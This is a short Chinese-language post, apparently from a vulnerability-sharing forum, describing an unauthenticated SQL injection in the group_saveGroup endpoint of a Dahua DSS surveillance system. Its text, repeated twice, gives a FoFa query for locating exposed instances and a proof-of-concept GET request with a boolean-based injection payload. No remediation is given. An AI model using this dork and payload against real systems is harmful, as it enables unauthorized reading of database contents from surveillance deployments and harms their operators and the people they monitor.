某华DSS数字监控系统group_saveGroup存在SQL注入漏洞,未经身份验证的攻击者可通过该漏洞获取数据库敏感信息。
FoFa语句:
app="dahua-DSS"
POC:
GET /emap/group_saveGroup?groupName=1%27+AND+2103%3D2103+AND+%271%27%3D%21 HTTP/1.1
Host:
某华DSS数字监控系统group_saveGroup存在SQL注入漏洞,未经身份验证的攻击者可通过该漏洞获取数据库敏感信息。
FoFa语句:
app="dahua-DSS"
POC:
GET /emap/group_saveGroup?groupName=1%27+AND+2103%3D2103+AND+%271%27%3D%21 HTTP/1.1
Host:
没有回复内容